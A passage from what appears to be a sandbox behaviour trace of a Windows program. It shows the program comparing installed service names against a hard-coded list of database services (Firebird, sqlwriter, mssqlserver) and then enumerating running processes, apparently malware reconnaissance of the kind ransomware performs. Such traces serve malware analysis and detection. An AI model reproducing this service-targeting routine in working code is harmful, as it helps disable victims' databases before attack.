(lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0299.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0299.398] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0299.398] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0299.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0299.399] lstrlenW (lpString="LSM") returned 3 [0299.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0299.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0299.399] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0299.399] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0299.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0299.399] lstrlenW (lpString="MpsSvc") returned 6 [0299.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0299.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0299.399] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0299.399] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0299.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0299.399] lstrlenW (lpString="NcbService") returned 10 [0299.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0299.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0299.399] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0299.399] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0299.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0299.399] lstrlenW (lpString="netprofm") returned 8 [0299.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0299.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0299.399] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0299.399] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0299.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0299.399] lstrlenW (lpString="NgcSvc") returned 6 [0299.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0299.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0299.399] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0299.400] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0299.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0299.400] lstrlenW (lpString="NlaSvc") returned 6 [0299.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0299.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0299.400] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0299.400] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0299.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0299.400] lstrlenW (lpString="nsi") returned 3 [0299.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0299.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0299.400] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0299.400] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0299.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0299.400] lstrlenW (lpString="PcaSvc") returned 6 [0299.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0299.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0299.400] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0299.400] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0299.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0299.400] lstrlenW (lpString="PlugPlay") returned 8 [0299.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0299.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0299.400] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0299.400] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0299.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0299.400] lstrlenW (lpString="Power") returned 5 [0299.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0299.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0299.401] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0299.401] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0299.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0299.401] lstrlenW (lpString="ProfSvc") returned 7 [0299.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0299.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0299.401] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0299.401] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0299.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0299.401] lstrlenW (lpString="RpcEptMapper") returned 12 [0299.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0299.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0299.401] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0299.401] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0299.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0299.401] lstrlenW (lpString="RpcSs") returned 5 [0299.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0299.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0299.401] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0299.401] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0299.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0299.401] lstrlenW (lpString="SamSs") returned 5 [0299.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0299.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0299.401] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0299.401] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0299.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0299.402] lstrlenW (lpString="Schedule") returned 8 [0299.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0299.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0299.402] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0299.402] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0299.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0299.402] lstrlenW (lpString="SecurityHealthService") returned 21 [0299.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0299.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0299.402] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0299.402] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0299.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0299.402] lstrlenW (lpString="SENS") returned 4 [0299.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0299.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0299.402] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0299.402] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0299.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0299.402] lstrlenW (lpString="ShellHWDetection") returned 16 [0299.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0299.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0299.402] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0299.402] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0299.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0299.402] lstrlenW (lpString="Spooler") returned 7 [0299.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0299.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0299.403] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0299.403] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0299.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0299.403] lstrlenW (lpString="StateRepository") returned 15 [0299.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0299.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0299.403] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0299.403] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0299.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0299.403] lstrlenW (lpString="SysMain") returned 7 [0299.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0299.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0299.403] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0299.403] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0299.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0299.403] lstrlenW (lpString="SystemEventsBroker") returned 18 [0299.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0299.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0299.403] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0299.403] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0299.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0299.403] lstrlenW (lpString="Themes") returned 6 [0299.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0299.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0299.404] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0299.404] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0299.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0299.404] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0299.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0299.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0299.404] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0299.404] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0299.404] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0299.404] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0299.404] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0299.404] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0299.404] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0299.404] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0299.404] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0299.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x47c [0299.633] Process32FirstW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.634] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0299.634] lstrlenW (lpString="System") returned 6 [0299.634] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0299.635] lstrlenW (lpString="smss.exe") returned 8 [0299.635] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0299.635] lstrlenW (lpString="csrss.exe") returned 9 [0299.636] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0299.636] lstrlenW (lpString="wininit.exe") returned 11 [0299.636] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0299.637] lstrlenW (lpString="csrss.exe") returned 9 [0299.637] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0299.637] lstrlenW (lpString="winlogon.exe") returned 12 [0299.638] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0299.638] lstrlenW (lpString="services.exe") returned 12 [0299.638] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0299.639] lstrlenW (lpString="lsass.exe") returned 9 [0299.639] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0299.640] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0299.640] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0299.640] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0299.640] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.641] lstrlenW (lpString="svchost.exe") returned 11 [0299.641] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.641] lstrlenW (lpString="svchost.exe") returned 11 [0299.641] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0299.642] lstrlenW (lpString="dwm.exe") returned 7 [0299.642] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.642] lstrlenW (lpString="svchost.exe") returned 11 [0299.643] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.643] lstrlenW (lpString="svchost.exe") returned 11 [0299.643] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.644] lstrlenW (lpString="svchost.exe") returned 11 [0299.644] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.644] lstrlenW (lpString="svchost.exe") returned 11 [0299.644] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.665] lstrlenW (lpString="svchost.exe") returned 11 [0299.665] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.666] lstrlenW (lpString="svchost.exe") returned 11 [0299.666] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.666] lstrlenW (lpString="svchost.exe") returned 11 [0299.666] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.667] lstrlenW (lpString="svchost.exe") returned 11 [0299.667] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.668] lstrlenW (lpString="svchost.exe") returned 11 [0299.668] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.668] lstrlenW (lpString="svchost.exe") returned 11 [0299.668] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0299.669] lstrlenW (lpString="spoolsv.exe") returned 11 [0299.669] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.670] lstrlenW (lpString="svchost.exe") returned 11 [0299.670] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0299.670] lstrlenW (lpString="audiodg.exe") returned 11 [0299.670] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0299.671] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0299.671] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0299.672] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0299.672] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0299.672] lstrlenW (lpString="Memory Compression") returned 18 [0299.672] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0299.673] lstrlenW (lpString="sihost.exe") returned 10 [0299.673] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.673] lstrlenW (lpString="svchost.exe") returned 11 [0299.673] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0299.674] lstrlenW (lpString="taskhostw.exe") returned 13 [0299.674] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0299.674] lstrlenW (lpString="explorer.exe") returned 12 [0299.674] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0299.675] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0299.675] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0299.676] lstrlenW (lpString="SearchUI.exe") returned 12 [0299.676] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0299.677] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0299.677] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0299.678] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0299.678] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, 